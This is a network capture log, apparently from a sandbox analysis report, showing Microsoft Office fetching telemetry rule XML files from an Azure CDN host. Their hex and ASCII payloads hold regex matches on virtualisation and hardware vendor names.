2024-11-05 17:46:06 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
62	192.168.2.4	49799	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:06 UTC	192	OUT	GET /rules/rule120664v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:07 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:06 GMT Content-Type: text/xml Content-Length: 502 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB6A0D312" x-ms-request-id: d30de13e-b01e-003e-435c-2e8e41000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174606Z-17df447cdb5t94hvhC1DFWw97800000001qg00000000nb0z x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:07 UTC	502	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
63	192.168.2.4	49800	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:06 UTC	192	OUT	GET /rules/rule120665v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:07 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:07 GMT Content-Type: text/xml Content-Length: 407 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D30478D" x-ms-request-id: 2fadba2e-601e-0070-7603-2fa0c9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174607Z-17df447cdb56mx55hC1DFWvy5w00000001eg00000000mpwr x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:07 UTC	407	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
64	192.168.2.4	49801	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:07 UTC	192	OUT	GET /rules/rule120666v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:07 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:07 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3F48DAE" x-ms-request-id: 6dc34679-101e-0034-7d01-2d96ff000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174607Z-16547b76f7f7rtshhC1DFWrtqn00000005kg000000004uqd x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:07 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
65	192.168.2.4	49802	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:07 UTC	192	OUT	GET /rules/rule120667v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:07 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:07 GMT Content-Type: text/xml Content-Length: 408 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT ETag: "0x8DC582BB9B6040B" x-ms-request-id: 2f2a95d3-901e-00ac-5b08-2cb69e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174607Z-16547b76f7f7lhvnhC1DFWa2k000000005f000000000178h x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:07 UTC	408	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">

Session ID	Source IP	Source Port	Destination IP	Destination Port
66	192.168.2.4	49803	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:07 UTC	192	OUT	GET /rules/rule120668v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:07 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:07 GMT Content-Type: text/xml Content-Length: 469 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT ETag: "0x8DC582BB3CAEBB8" x-ms-request-id: 5df09d77-001e-00a2-0c15-2dd4d5000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174607Z-16547b76f7f9bs6dhC1DFWt3rg00000005g0000000006uw6 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT X-Cache-Info: L1_T2 Accept-Ranges: bytes
2024-11-05 17:46:07 UTC	469	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.4	49805	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:07 UTC	192	OUT	GET /rules/rule120669v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:07 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:07 GMT Content-Type: text/xml Content-Length: 416 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT ETag: "0x8DC582BB5284CCE" x-ms-request-id: a822020c-901e-005b-1ae1-2e2005000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174607Z-17df447cdb5c9wvxhC1DFWn08n00000001t000000000anba x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:07 UTC	416	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.4	49806	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:07 UTC	192	OUT	GET /rules/rule120670v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:07 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:07 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:33 GMT ETag: "0x8DC582B91EAD002" x-ms-request-id: 86fb44b9-501e-0078-06d2-2c06cf000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174607Z-16547b76f7fknvdnhC1DFWxnys00000005hg0000000099wg x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:07 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120670" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.4	49808	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:08 UTC	192	OUT	GET /rules/rule120672v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:08 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:08 GMT Content-Type: text/xml Content-Length: 475 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:41 GMT ETag: "0x8DC582BBA740822" x-ms-request-id: 898dd9bc-901e-0048-53d2-2cb800000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174608Z-16547b76f7fxsvjdhC1DFWprrs00000005a000000000s06f x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:08 UTC	475	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120672" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.4	49807	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:08 UTC	192	OUT	GET /rules/rule120671v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:08 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:08 GMT Content-Type: text/xml Content-Length: 432 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:15 GMT ETag: "0x8DC582BAABA2A10" x-ms-request-id: 4b06b021-701e-000d-6755-2e6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174608Z-17df447cdb59mt7dhC1DFWqpg400000001q0000000002fek x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:08 UTC	432	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 53 73 5d 5b 55 75 5d 5b 50 70 5d 5b 45 65 5d 5b 52 72 5d 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120671" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120669" /> <SR T="2" R="^([Ss][Uu][Pp][Ee][Rr][Mm][Ii][Cc][Rr][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.4	49809	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:08 UTC	192	OUT	GET /rules/rule120673v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:08 UTC	491	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:08 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:31 GMT ETag: "0x8DC582BB464F255" x-ms-request-id: 44d502e9-701e-000d-5c08-2c6de3000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174608Z-16547b76f7f8dwtrhC1DFWd1zn00000005h000000000nvqy x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:08 UTC	427	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 54 74 5d 5b 48 68 5d 5b 49 69 5d 5b 4e 6e 5d 5b 50 70 5d 5b 55 75 5d 5b 54 74 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120673" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120671" /> <SR T="2" R="([Tt][Hh][Ii][Nn][Pp][Uu][Tt][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.4	49810	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:08 UTC	192	OUT	GET /rules/rule120674v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-05 17:46:08 UTC	470	IN	HTTP/1.1 200 OK Date: Tue, 05 Nov 2024 17:46:08 GMT Content-Type: text/xml Content-Length: 474 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT ETag: "0x8DC582BA4037B0D" x-ms-request-id: 43524bb3-601e-003e-69d2-2c3248000000 x-ms-version: 2018-03-28 x-azure-ref: 20241105T174608Z-16547b76f7f67wxlhC1DFWah9w00000005gg00000000516p x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-05 17:46:08 UTC	474	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 37 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 37 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120674" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120673" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.4	49811	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-05 17:46:08 UTC	192	OUT	GET /rules/rule120675v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
